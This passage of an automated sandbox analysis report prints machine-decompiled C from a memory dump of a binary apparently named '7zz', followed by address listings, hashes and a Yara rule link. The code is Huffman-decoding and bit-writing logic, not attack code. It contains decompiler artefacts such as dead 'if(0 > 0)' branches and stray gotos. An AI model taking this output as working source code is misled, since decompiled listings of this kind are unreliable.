							_t207 =  *((intOrPtr*)(_t303 + 0x1688 + _t258 * 4)) +  *((intOrPtr*)(_t284 - 4));
							 *((intOrPtr*)(_t303 + 0x168c + _t258 * 4)) = _t207;
							 *((intOrPtr*)(_t305 + 0x80 + _t258 * 4)) = _t207;
							if(_t258 <= 9) {
								_t249 =  *(_t303 + 0x1648 + _t258 * 4) >> 7;
								if(_t141 < _t249) {
									_t42 = _t303 + 0x1720; // 0x1720
									_t278 = _t141 + _t42;
									_t250 = _t249 - _t141;
									 *(_t305 + 0x18) = _t250;
									_t302 = _t250;
									_t251 = _t250 >> 2;
									memset(_t278 + _t251, memset(_t278, _t258, _t251 << 2), (_t302 & 0x00000003) << 0);
									_t305 = _t305 + 0x18;
									_t274 =  *(_t305 + 0x1c);
									_t141 =  *((intOrPtr*)(_t305 + 0x10)) + _t302;
									 *((intOrPtr*)(_t305 + 0x10)) = _t141;
								}
							}
							_t258 = _t258 + 1;
							if(_t258 <= 0x10) {
								continue;
							} else {
								_t259 = 0;
								do {
									if(0 != 0) {
										_t208 =  *(_t305 + 0x80);
										 *((intOrPtr*)(_t303 + 0x16d0 + _t208 * 4)) = _t259;
										 *(_t305 + 0x80) = _t208 + 1;
									}
									_t259 = _t259 + 1;
								} while (_t259 < 0x14);
								_t190 = 0;
								 *((intOrPtr*)(_t305 + 0x20)) = 0;
								if( *((intOrPtr*)(_t305 + 0xd0)) <= 0) {
									L51:
									return 1;
								} else {
									_t146 =  *((intOrPtr*)(_t305 + 0xc8));
									_t210 = _t146;
									_t287 =  *((intOrPtr*)(_t305 + 0xcc)) - _t146;
									 *((intOrPtr*)(_t305 + 0x10)) = _t210;
									 *((intOrPtr*)(_t305 + 0x24)) = _t287;
									L19:
									while(1) {
										if(_t190 == 0) {
											_t275 = _t303 + 8;
											_t291 =  *(_t303 + 0x28) >> 0x0000000f -  *((intOrPtr*)(_t303 + 0x2c)) >> 0x00000001 & 0x0000ffff;
											if(_t291 >=  *((intOrPtr*)(_t303 + 0x166c))) {
												_t149 = _t303 + 0x1670;
												_t191 = 0xa;
												if(_t291 >=  *((intOrPtr*)(_t303 + 0x1670))) {
													do {
														_t247 =  *((intOrPtr*)(_t149 + 4));
														_t149 = _t149 + 4;
														_t191 = _t191 + 1;
													} while (_t291 >= _t247);
												}
											} else {
												_t191 =  *((intOrPtr*)((_t291 >> 7) + _t303 + 0x1720));
											}
											_t215 =  *((intOrPtr*)(_t275 + 0x24)) + _t191;
											 *((intOrPtr*)(_t275 + 0x24)) = _t215;
											if(_t215 >= 0x10) {
												do {
													_t167 =  *_t275;
													if(_t167 <  *((intOrPtr*)(_t275 + 4))) {
														 *(_t305 + 0x18) =  *_t167;
														 *_t275 = _t167 + 1;
													} else {
														 *(_t305 + 0x18) = E0040E070(_t275);
													}
													_t169 =  *_t275;
													if(_t169 <  *((intOrPtr*)(_t275 + 4))) {
														 *(_t305 + 0x1c) =  *_t169;
														 *_t275 = _t169 + 1;
													} else {
														 *(_t305 + 0x1c) = E0040E070(_t275);
													}
													_t244 =  *((intOrPtr*)(_t275 + 0x24)) + 0xfffffff0;
													 *((intOrPtr*)(_t275 + 0x24)) = _t244;
													 *(_t275 + 0x20) = ( *(_t275 + 0x20) << 0x00000008 |  *(_t305 + 0x1c) & 0x000000ff) << 0x00000008 |  *(_t305 + 0x18) & 0x000000ff;
												} while (_t244 >= 0x10);
											}
											_t294 = (_t291 -  *((intOrPtr*)(_t303 + 0x1644 + _t191 * 4)) >> 0x10 - _t191) +  *((intOrPtr*)(_t303 + 0x168c + _t191 * 4));
											if(_t294 >= 0x14) {
												goto L50;
											} else {
												_t219 =  *((intOrPtr*)(_t303 + 0x16d0 + _t294 * 4));
												if(_t219 != 0x11) {
													if(_t219 != 0x12) {
														if(_t219 == 0x13) {
															_t151 = E00450B20(1);
															_t261 =  *((intOrPtr*)(_t275 + 0x24));
															_t190 = _t151 + 4;
															_t298 =  *(_t275 + 0x20) >> 0x0000000f - _t261 >> 0x00000001 & 0x0000ffff;
															if(_t298 >=  *((intOrPtr*)(_t303 + 0x166c))) {
																_t153 = _t303 + 0x1670;
																 *(_t305 + 0x14) = 0xa;
																if(_t298 >=  *((intOrPtr*)(_t303 + 0x1670))) {
																	do {
																		_t153 = _t153 + 4;
																		 *(_t305 + 0x14) =  *(_t305 + 0x14) + 1;
																	} while (_t298 >=  *_t153);
																}
															} else {
																 *(_t305 + 0x14) = 0;
															}
															 *((intOrPtr*)(_t275 + 0x24)) = _t261 +  *(_t305 + 0x14);
															E00450FC0(_t275);
															_t301 = (_t298 -  *((intOrPtr*)(_t303 + 0x1644 +  *(_t305 + 0x14) * 4)) >> 0x10 -  *(_t305 + 0x14)) +  *((intOrPtr*)(_t303 + 0x168c +  *(_t305 + 0x14) * 4));
															if(_t301 >= 0x14) {
																goto L50;
															} else {
																_t219 =  *((intOrPtr*)(_t303 + 0x16d0 + _t301 * 4));
																if( *((intOrPtr*)(_t303 + 0x16d0 + _t301 * 4)) > 0x10) {
																	goto L50;
																} else {
																	goto L47;
																}
															}
														} else {
															if(_t219 > 0x10) {
																goto L50;
															} else {
																_t190 = 1;
																L47:
																goto L48;
															}
														}
													} else {
														_t190 = E00450B20(5) + 0x14;
														_t266 = 0;
														goto L48;
													}
												} else {
													_t190 = E00450B20(4) + 4;
													_t266 = 0;
													goto L48;
												}
											}
										} else {
											 *((char*)(_t287 + _t210)) = _t266;
											 *_t210 = _t266;
											 *((intOrPtr*)(_t305 + 0x20)) =  *((intOrPtr*)(_t305 + 0x20)) + 1;
											 *((intOrPtr*)(_t305 + 0x10)) = _t210 + 1;
											_t190 = _t190 - 1;
											L48:
											if( *((intOrPtr*)(_t305 + 0x20)) >=  *((intOrPtr*)(_t305 + 0xd0))) {
												goto L51;
											} else {
												_t210 =  *((intOrPtr*)(_t305 + 0x10));
												_t287 =  *((intOrPtr*)(_t305 + 0x24));
												continue;
											}
										}
										goto L52;
									}
								}
							}
							goto L52;
						}
						break;
					}
					L52:
				}
				L50:
				return 0;
				goto L52;
				L1:
				 *((char*)(_t304 + _t281 + 0x28)) = E00450B20(4);
				_t281 = _t281 + 1;
				if(_t281 < 0x14) {
					goto L1;
				} else {
					_t257 = __ecx + 0x16d0;
					memset(_t304 + 0x40, 0, 0x10 << 2);
					_t305 = _t304 + 0xc;
					_t202 = 0;
				}
				goto L3;
			}










































                                                                                                                                    0x00450bdc
                                                                                                                                    0x00450bde
                                                                                                                                    0x00450bde
                                                                                                                                    0x00000000
                                                                                                                                    0x00450c08
                                                                                                                                    0x00450c20
                                                                                                                                    0x00450c26
                                                                                                                                    0x00450c27
                                                                                                                                    0x00450c2d
                                                                                                                                    0x00450c2f
                                                                                                                                    0x00000000
                                                                                                                                    0x00450c31
                                                                                                                                    0x00450c31
                                                                                                                                    0x00450c33
                                                                                                                                    0x00450c35
                                                                                                                                    0x00450c39
                                                                                                                                    0x00450c3f
                                                                                                                                    0x00450c45
                                                                                                                                    0x00450c49
                                                                                                                                    0x00450c4e
                                                                                                                                    0x00450c52
                                                                                                                                    0x00450c5f
                                                                                                                                    0x00450c67
                                                                                                                                    0x00450c6b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00450c74
                                                                                                                                    0x00450c79
                                                                                                                                    0x00450c7b
                                                                                                                                    0x00450c7b
                                                                                                                                    0x00450c80
                                                                                                                                    0x00450c8e
                                                                                                                                    0x00450c93
                                                                                                                                    0x00450c9a
                                                                                                                                    0x00450ca1
                                                                                                                                    0x00450caa
                                                                                                                                    0x00450caf
                                                                                                                                    0x00450cb1
                                                                                                                                    0x00450cb1
                                                                                                                                    0x00450cb8
                                                                                                                                    0x00450cbc
                                                                                                                                    0x00450cc2
                                                                                                                                    0x00450cce
                                                                                                                                    0x00450cd8
                                                                                                                                    0x00450cd8
                                                                                                                                    0x00450cde
                                                                                                                                    0x00450ce4
                                                                                                                                    0x00450ce6
                                                                                                                                    0x00450ce6
                                                                                                                                    0x00450caf
                                                                                                                                    0x00450cea
                                                                                                                                    0x00450cee
                                                                                                                                    0x00000000
                                                                                                                                    0x00450cf4
                                                                                                                                    0x00450cf4
                                                                                                                                    0x00450cf6
                                                                                                                                    0x00450cfe
                                                                                                                                    0x00450d00
                                                                                                                                    0x00450d0e
                                                                                                                                    0x00450d16
                                                                                                                                    0x00450d16
                                                                                                                                    0x00450d18
                                                                                                                                    0x00450d19
                                                                                                                                    0x00450d25
                                                                                                                                    0x00450d29
                                                                                                                                    0x00450d33
                                                                                                                                    0x00450fa9
                                                                                                                                    0x00450fb2
                                                                                                                                    0x00450d39
                                                                                                                                    0x00450d39
                                                                                                                                    0x00450d47
                                                                                                                                    0x00450d49
                                                                                                                                    0x00450d4b
                                                                                                                                    0x00450d4f
                                                                                                                                    0x00000000
                                                                                                                                    0x00450d53
                                                                                                                                    0x00450d55
                                                                                                                                    0x00450d76
                                                                                                                                    0x00450d8a
                                                                                                                                    0x00450d92
                                                                                                                                    0x00450daa
                                                                                                                                    0x00450db2
                                                                                                                                    0x00450db7
                                                                                                                                    0x00450db9
                                                                                                                                    0x00450db9
                                                                                                                                    0x00450dbc
                                                                                                                                    0x00450dbf
                                                                                                                                    0x00450dc0
                                                                                                                                    0x00450db9
                                                                                                                                    0x00450d94
                                                                                                                                    0x00450d9b
                                                                                                                                    0x00450d9b
                                                                                                                                    0x00450dc7
                                                                                                                                    0x00450dcb
                                                                                                                                    0x00450dd1
                                                                                                                                    0x00450dd3
                                                                                                                                    0x00450dd3
                                                                                                                                    0x00450dda
                                                                                                                                    0x00450dec
                                                                                                                                    0x00450df0
                                                                                                                                    0x00450ddc
                                                                                                                                    0x00450de3
                                                                                                                                    0x00450de3
                                                                                                                                    0x00450df2
                                                                                                                                    0x00450df9
                                                                                                                                    0x00450e0b
                                                                                                                                    0x00450e0f
                                                                                                                                    0x00450dfb
                                                                                                                                    0x00450e02
                                                                                                                                    0x00450e02
                                                                                                                                    0x00450e33
                                                                                                                                    0x00450e38
                                                                                                                                    0x00450e3b
                                                                                                                                    0x00450e40
                                                                                                                                    0x00450dd3
                                                                                                                                    0x00450e57
                                                                                                                                    0x00450e61
                                                                                                                                    0x00000000
                                                                                                                                    0x00450e67
                                                                                                                                    0x00450e67
                                                                                                                                    0x00450e71
                                                                                                                                    0x00450e8b
                                                                                                                                    0x00450ea5
                                                                                                                                    0x00450ebe
                                                                                                                                    0x00450ec3
                                                                                                                                    0x00450eda
                                                                                                                                    0x00450edf
                                                                                                                                    0x00450ee7
                                                                                                                                    0x00450f03
                                                                                                                                    0x00450f0b
                                                                                                                                    0x00450f13
                                                                                                                                    0x00450f15
                                                                                                                                    0x00450f19
                                                                                                                                    0x00450f1d
                                                                                                                                    0x00450f23
                                                                                                                                    0x00450f15
                                                                                                                                    0x00450ee9
                                                                                                                                    0x00450ef7
                                                                                                                                    0x00450ef7
                                                                                                                                    0x00450f2f
                                                                                                                                    0x00450f32
                                                                                                                                    0x00450f4d
                                                                                                                                    0x00450f57
                                                                                                                                    0x00000000
                                                                                                                                    0x00450f59
                                                                                                                                    0x00450f59
                                                                                                                                    0x00450f63
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00450f63
                                                                                                                                    0x00450ea7
                                                                                                                                    0x00450eaa
                                                                                                                                    0x00000000
                                                                                                                                    0x00450eb0
                                                                                                                                    0x00450eb0
                                                                                                                                    0x00450f65
                                                                                                                                    0x00000000
                                                                                                                                    0x00450f79
                                                                                                                                    0x00450eaa
                                                                                                                                    0x00450e8d
                                                                                                                                    0x00450e98
                                                                                                                                    0x00450e9b
                                                                                                                                    0x00000000
                                                                                                                                    0x00450e9b
                                                                                                                                    0x00450e73
                                                                                                                                    0x00450e7e
                                                                                                                                    0x00450e81
                                                                                                                                    0x00000000
                                                                                                                                    0x00450e81
                                                                                                                                    0x00450e71
                                                                                                                                    0x00450d57
                                                                                                                                    0x00450d5b
                                                                                                                                    0x00450d5e
                                                                                                                                    0x00450d62
                                                                                                                                    0x00450d66
                                                                                                                                    0x00450d6a
                                                                                                                                    0x00450f7b
                                                                                                                                    0x00450f88
                                                                                                                                    0x00000000
                                                                                                                                    0x00450f8a
                                                                                                                                    0x00450f8a
                                                                                                                                    0x00450f8e
                                                                                                                                    0x00000000
                                                                                                                                    0x00450f8e
                                                                                                                                    0x00450f88
                                                                                                                                    0x00000000
                                                                                                                                    0x00450d55
                                                                                                                                    0x00450d53
                                                                                                                                    0x00450d33
                                                                                                                                    0x00000000
                                                                                                                                    0x00450cee
                                                                                                                                    0x00000000
                                                                                                                                    0x00450c4e
                                                                                                                                    0x00000000
                                                                                                                                    0x00450c2f
                                                                                                                                    0x00450f9a
                                                                                                                                    0x00450fa3
                                                                                                                                    0x00000000
                                                                                                                                    0x00450be0
                                                                                                                                    0x00450be9
                                                                                                                                    0x00450bed
                                                                                                                                    0x00450bf1
                                                                                                                                    0x00000000
                                                                                                                                    0x00450bf3
                                                                                                                                    0x00450bfe
                                                                                                                                    0x00450c04
                                                                                                                                    0x00450c04
                                                                                                                                    0x00450c06
                                                                                                                                    0x00450c06
                                                                                                                                    0x00000000

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 18eb27e6422edd7d087eaa85b9cb47c4f35199851569dbc48901ad76aac91017
                                                                                                                                    • Instruction ID: ad5e04536eb3a377db8700aff306818d5d26cec6f51285805bcfce31696dce2f
                                                                                                                                    • Opcode Fuzzy Hash: 18eb27e6422edd7d087eaa85b9cb47c4f35199851569dbc48901ad76aac91017
                                                                                                                                    • Instruction Fuzzy Hash: 5BB1D8367043458FDB28CE28D5906AEB7E1BBC5309F15093EEC86D7782C775A909CB85
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0044CA40 Relevance: .3, Instructions: 305COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                    			E0044CA40(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi) {
				signed int _t120;
				signed int _t122;
				signed char _t123;
				signed char _t126;
				signed int _t129;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				signed int _t152;
				signed int _t165;
				signed char _t172;
				signed char _t177;
				signed char _t178;
				signed char _t179;
				intOrPtr* _t193;
				intOrPtr _t266;
				intOrPtr _t277;
				intOrPtr _t289;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				intOrPtr* _t297;
				intOrPtr _t299;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				intOrPtr _t308;
				void* _t309;

				_t299 = __ecx;
				 *((intOrPtr*)(_t309 + 8)) = __ecx;
				E0044C9C0(__ecx + 0xd7c, __ecx + 0x73c, 0x120);
				E0044C9C0(__ecx + 0x11fc, __ecx + 0x85c, 0x20);
				_t120 = 0;
				 *((intOrPtr*)(_t309 + 0xc)) = 0;
				if( *((intOrPtr*)(__ecx + 0x508)) > 0) {
					do {
						_t193 =  *((intOrPtr*)(_t299 + 0x4a8)) + _t120 * 4;
						 *((intOrPtr*)(_t309 + 0x20)) = _t193;
						_t122 =  *_t193;
						if(_t122 < 0x8000) {
							_t123 = _t122 & 0x0000ffff;
							 *(_t309 + 0x14) = _t123;
							_t297 = _t299 + 0x470;
							 *((intOrPtr*)(_t309 + 0x1c)) = 0;
							_t172 =  *(_t299 + 0x1180);
							_t291 = 0;
							__eflags = 0;
							if(0 > 0) {
								while(1) {
									_t152 =  *(_t297 + 0x28);
									__eflags = _t291 - _t152;
									if(_t291 < _t152) {
										break;
									}
									_t291 = _t291 - _t152;
									 *( *((intOrPtr*)(_t297 + 4)) +  *_t297) = _t172 << 0x00000008 - _t152 |  *(_t297 + 0x2c);
									_t308 =  *((intOrPtr*)(_t297 + 4)) + 1;
									 *((intOrPtr*)(_t297 + 4)) = _t308;
									__eflags = _t308 -  *((intOrPtr*)(_t297 + 8));
									if(__eflags == 0) {
										L0040EFBD(_t297, __eflags);
									}
									 *(_t297 + 0x28) = 8;
									_t172 = _t172 >>  *(_t297 + 0x28);
									__eflags = _t291;
									 *(_t297 + 0x2c) = 0;
									if(_t291 > 0) {
										continue;
									} else {
									}
									L16:
									_t123 =  *(_t309 + 0x14);
									_t299 =  *((intOrPtr*)(_t309 + 0x10));
									goto L17;
								}
								_t304 =  *(_t297 + 0x28);
								_t305 = _t304 - _t291;
								__eflags = _t305;
								 *(_t297 + 0x2c) =  *(_t297 + 0x2c) | ((0x00000001 << _t291) - 0x00000001 & _t172) << 0x00000008 - _t304;
								 *(_t297 + 0x28) = _t305;
								goto L16;
							}
							L17:
							_t292 = 0;
							__eflags = 0;
							_t177 = _t123;
							if(0 > 0) {
								while(1) {
									_t145 =  *(_t297 + 0x28);
									__eflags = _t292 - _t145;
									if(_t292 < _t145) {
										break;
									}
									_t292 = _t292 - _t145;
									 *( *_t297 +  *((intOrPtr*)(_t297 + 4))) = _t177 << 0x00000008 - _t145 |  *(_t297 + 0x2c);
									_t289 =  *((intOrPtr*)(_t297 + 4)) + 1;
									 *((intOrPtr*)(_t297 + 4)) = _t289;
									__eflags = _t289 -  *((intOrPtr*)(_t297 + 8));
									if(__eflags == 0) {
										L0040EFBD(_t297, __eflags);
									}
									 *(_t297 + 0x28) = 8;
									_t177 = _t177 >>  *(_t297 + 0x28);
									__eflags = _t292;
									 *(_t297 + 0x2c) = 0;
									if(_t292 > 0) {
										continue;
									} else {
									}
									goto L24;
								}
								_t146 =  *(_t297 + 0x28);
								_t147 = _t146 - _t292;
								__eflags = _t147;
								 *(_t297 + 0x2c) =  *(_t297 + 0x2c) | ((0x00000001 << _t292) - 0x00000001 & _t177) << 0x00000008 - _t146;
								 *(_t297 + 0x28) = _t147;
							}
							L24:
							_t126 =  *((intOrPtr*)( *((intOrPtr*)(_t309 + 0x20)) + 2));
							__eflags = 0 - 0x200;
							 *(_t309 + 0x14) = 0;
							if(0 >= 0x200) {
								_t301 = 0x10;
								__eflags = 0x10;
							} else {
								_t301 = 0;
							}
							_t178 =  *( *((intOrPtr*)(_t309 + 0x10)) + 0x11fc + _t301 * 4);
							_t293 = 0;
							__eflags = 0;
							if(0 > 0) {
								while(1) {
									_t137 =  *(_t297 + 0x28);
									__eflags = _t293 - _t137;
									if(_t293 < _t137) {
										break;
									}
									_t293 = _t293 - _t137;
									 *( *_t297 +  *((intOrPtr*)(_t297 + 4))) = _t178 << 0x00000008 - _t137 |  *(_t297 + 0x2c);
									_t277 =  *((intOrPtr*)(_t297 + 4)) + 1;
									 *((intOrPtr*)(_t297 + 4)) = _t277;
									__eflags = _t277 -  *((intOrPtr*)(_t297 + 8));
									if(__eflags == 0) {
										L0040EFBD(_t297, __eflags);
									}
									 *(_t297 + 0x28) = 8;
									_t178 = _t178 >>  *(_t297 + 0x28);
									__eflags = _t293;
									 *(_t297 + 0x2c) = 0;
									if(_t293 > 0) {
										continue;
									} else {
									}
									L34:
									_t126 =  *(_t309 + 0x14);
									goto L35;
								}
								_t138 =  *(_t297 + 0x28);
								_t139 = _t138 - _t293;
								__eflags = _t139;
								 *(_t297 + 0x2c) =  *(_t297 + 0x2c) | ((0x00000001 << _t293) - 0x00000001 & _t178) << 0x00000008 - _t138;
								 *(_t297 + 0x28) = _t139;
								goto L34;
							}
							L35:
							_t294 = 0;
							__eflags = 0;
							_t179 = _t126 -  *((intOrPtr*)(0x47c134 + _t301 * 4));
							if(0 > 0) {
								while(1) {
									_t129 =  *(_t297 + 0x28);
									__eflags = _t294 - _t129;
									if(_t294 < _t129) {
										goto L39;
									}
									_t294 = _t294 - _t129;
									L0042F593(_t179, _t297, _t179 << 0x00000008 - _t129 |  *(_t297 + 0x2c));
									 *(_t297 + 0x28) = 8;
									_t179 = _t179 >>  *(_t297 + 0x28);
									__eflags = _t294;
									 *(_t297 + 0x2c) = 0;
									if(__eflags > 0) {
										continue;
									} else {
									}
									goto L40;
								}
								goto L39;
							}
							goto L40;
						} else {
							_t297 = _t299 + 0x470;
							_t179 =  *(_t299 + 0xd7c);
							_t294 = 0;
							if(0 > 0) {
								while(1) {
									_t165 =  *(_t297 + 0x28);
									if(_t294 < _t165) {
										break;
									}
									_t294 = _t294 - _t165;
									 *( *((intOrPtr*)(_t297 + 4)) +  *_t297) = _t179 << 0x00000008 - _t165 |  *(_t297 + 0x2c);
									_t266 =  *((intOrPtr*)(_t297 + 4)) + 1;
									 *((intOrPtr*)(_t297 + 4)) = _t266;
									_t314 = _t266 -  *((intOrPtr*)(_t297 + 8));
									if(_t266 ==  *((intOrPtr*)(_t297 + 8))) {
										L0040EFBD(_t297, _t314);
									}
									 *(_t297 + 0x28) = 8;
									_t179 = _t179 >>  *(_t297 + 0x28);
									 *(_t297 + 0x2c) = 0;
									if(_t294 > 0) {
										continue;
									} else {
									}
									goto L41;
								}
								L39:
								_t302 =  *(_t297 + 0x28);
								_t303 = _t302 - _t294;
								__eflags = _t303;
								 *(_t297 + 0x2c) =  *(_t297 + 0x2c) | ((0x00000001 << _t294) - 0x00000001 & _t179) << 0x00000008 - _t302;
								 *(_t297 + 0x28) = _t303;
								L40:
								_t299 =  *((intOrPtr*)(_t309 + 0x10));
							}
						}
						L41:
						_t120 =  *(_t309 + 0x18) + 1;
						 *(_t309 + 0x18) = _t120;
					} while (_t120 <  *((intOrPtr*)(_t299 + 0x508)));
				}
				return E0044CDD0(_t299 + 0x470,  *((intOrPtr*)(_t299 + 0x117c)), 0);
			}





































                                                                                                                                    0x0044ca44
                                                                                                                                    0x0044ca4b
                                                                                                                                    0x0044ca5b
                                                                                                                                    0x0044ca6e
                                                                                                                                    0x0044ca79
                                                                                                                                    0x0044ca7d
                                                                                                                                    0x0044ca81
                                                                                                                                    0x0044ca8a
                                                                                                                                    0x0044ca90
                                                                                                                                    0x0044ca93
                                                                                                                                    0x0044ca97
                                                                                                                                    0x0044ca9e
                                                                                                                                    0x0044cb1b
                                                                                                                                    0x0044cb24
                                                                                                                                    0x0044cb2e
                                                                                                                                    0x0044cb34
                                                                                                                                    0x0044cb3f
                                                                                                                                    0x0044cb46
                                                                                                                                    0x0044cb48
                                                                                                                                    0x0044cb4a
                                                                                                                                    0x0044cb4c
                                                                                                                                    0x0044cb4c
                                                                                                                                    0x0044cb4f
                                                                                                                                    0x0044cb51
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044cb58
                                                                                                                                    0x0044cb6a
                                                                                                                                    0x0044cb73
                                                                                                                                    0x0044cb76
                                                                                                                                    0x0044cb79
                                                                                                                                    0x0044cb7b
                                                                                                                                    0x0044cb7f
                                                                                                                                    0x0044cb84
                                                                                                                                    0x0044cb8b
                                                                                                                                    0x0044cb92
                                                                                                                                    0x0044cb94
                                                                                                                                    0x0044cb96
                                                                                                                                    0x0044cb9a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044cb9c
                                                                                                                                    0x0044cbc1
                                                                                                                                    0x0044cbc1
                                                                                                                                    0x0044cbc5
                                                                                                                                    0x00000000
                                                                                                                                    0x0044cbc5
                                                                                                                                    0x0044cb9e
                                                                                                                                    0x0044cbb9
                                                                                                                                    0x0044cbb9
                                                                                                                                    0x0044cbbb
                                                                                                                                    0x0044cbbe
                                                                                                                                    0x00000000
                                                                                                                                    0x0044cbbe
                                                                                                                                    0x0044cbc9
                                                                                                                                    0x0044cbda
                                                                                                                                    0x0044cbe3
                                                                                                                                    0x0044cbe5
                                                                                                                                    0x0044cbe7
                                                                                                                                    0x0044cbe9
                                                                                                                                    0x0044cbe9
                                                                                                                                    0x0044cbec
                                                                                                                                    0x0044cbee
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044cbf9
                                                                                                                                    0x0044cc07
                                                                                                                                    0x0044cc10
                                                                                                                                    0x0044cc13
                                                                                                                                    0x0044cc16
                                                                                                                                    0x0044cc18
                                                                                                                                    0x0044cc1c
                                                                                                                                    0x0044cc1c
                                                                                                                                    0x0044cc24
                                                                                                                                    0x0044cc2b
                                                                                                                                    0x0044cc2d
                                                                                                                                    0x0044cc2f
                                                                                                                                    0x0044cc33
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044cc35
                                                                                                                                    0x00000000
                                                                                                                                    0x0044cc33
                                                                                                                                    0x0044cc37
                                                                                                                                    0x0044cc52
                                                                                                                                    0x0044cc52
                                                                                                                                    0x0044cc54
                                                                                                                                    0x0044cc57
                                                                                                                                    0x0044cc57
                                                                                                                                    0x0044cc5a
                                                                                                                                    0x0044cc60
                                                                                                                                    0x0044cc64
                                                                                                                                    0x0044cc69
                                                                                                                                    0x0044cc6d
                                                                                                                                    0x0044cc8a
                                                                                                                                    0x0044cc8a
                                                                                                                                    0x0044cc6f
                                                                                                                                    0x0044cc77
                                                                                                                                    0x0044cc77
                                                                                                                                    0x0044cc9a
                                                                                                                                    0x0044cca1
                                                                                                                                    0x0044cca3
                                                                                                                                    0x0044cca5
                                                                                                                                    0x0044cca7
                                                                                                                                    0x0044cca7
                                                                                                                                    0x0044ccaa
                                                                                                                                    0x0044ccac
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044ccb3
                                                                                                                                    0x0044ccc5
                                                                                                                                    0x0044ccce
                                                                                                                                    0x0044ccd1
                                                                                                                                    0x0044ccd4
                                                                                                                                    0x0044ccd6
                                                                                                                                    0x0044ccda
                                                                                                                                    0x0044ccda
                                                                                                                                    0x0044cce2
                                                                                                                                    0x0044cce9
                                                                                                                                    0x0044cceb
                                                                                                                                    0x0044cced
                                                                                                                                    0x0044ccf1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044ccf3
                                                                                                                                    0x0044cd18
                                                                                                                                    0x0044cd18
                                                                                                                                    0x00000000
                                                                                                                                    0x0044cd18
                                                                                                                                    0x0044ccf5
                                                                                                                                    0x0044cd10
                                                                                                                                    0x0044cd10
                                                                                                                                    0x0044cd12
                                                                                                                                    0x0044cd15
                                                                                                                                    0x00000000
                                                                                                                                    0x0044cd15
                                                                                                                                    0x0044cd1c
                                                                                                                                    0x0044cd24
                                                                                                                                    0x0044cd2f
                                                                                                                                    0x0044cd31
                                                                                                                                    0x0044cd33
                                                                                                                                    0x0044cd35
                                                                                                                                    0x0044cd35
                                                                                                                                    0x0044cd38
                                                                                                                                    0x0044cd3a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044cd45
                                                                                                                                    0x0044cd51
                                                                                                                                    0x0044cd59
                                                                                                                                    0x0044cd60
                                                                                                                                    0x0044cd62
                                                                                                                                    0x0044cd64
                                                                                                                                    0x0044cd68
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044cd6a
                                                                                                                                    0x00000000
                                                                                                                                    0x0044cd68
                                                                                                                                    0x00000000
                                                                                                                                    0x0044cd35
                                                                                                                                    0x00000000
                                                                                                                                    0x0044caa0
                                                                                                                                    0x0044caa8
                                                                                                                                    0x0044cab5
                                                                                                                                    0x0044cabc
                                                                                                                                    0x0044cac0
                                                                                                                                    0x0044cac6
                                                                                                                                    0x0044cac6
                                                                                                                                    0x0044cacb
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044cad6
                                                                                                                                    0x0044cae8
                                                                                                                                    0x0044caf1
                                                                                                                                    0x0044caf4
                                                                                                                                    0x0044caf7
                                                                                                                                    0x0044caf9
                                                                                                                                    0x0044cafd
                                                                                                                                    0x0044cafd
                                                                                                                                    0x0044cb05
                                                                                                                                    0x0044cb0c
                                                                                                                                    0x0044cb10
                                                                                                                                    0x0044cb14
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044cb16
                                                                                                                                    0x00000000
                                                                                                                                    0x0044cb14
                                                                                                                                    0x0044cd6c
                                                                                                                                    0x0044cd6c
                                                                                                                                    0x0044cd87
                                                                                                                                    0x0044cd87
                                                                                                                                    0x0044cd89
                                                                                                                                    0x0044cd8c
                                                                                                                                    0x0044cd8f
                                                                                                                                    0x0044cd8f
                                                                                                                                    0x0044cd8f
                                                                                                                                    0x0044cac0
                                                                                                                                    0x0044cd93
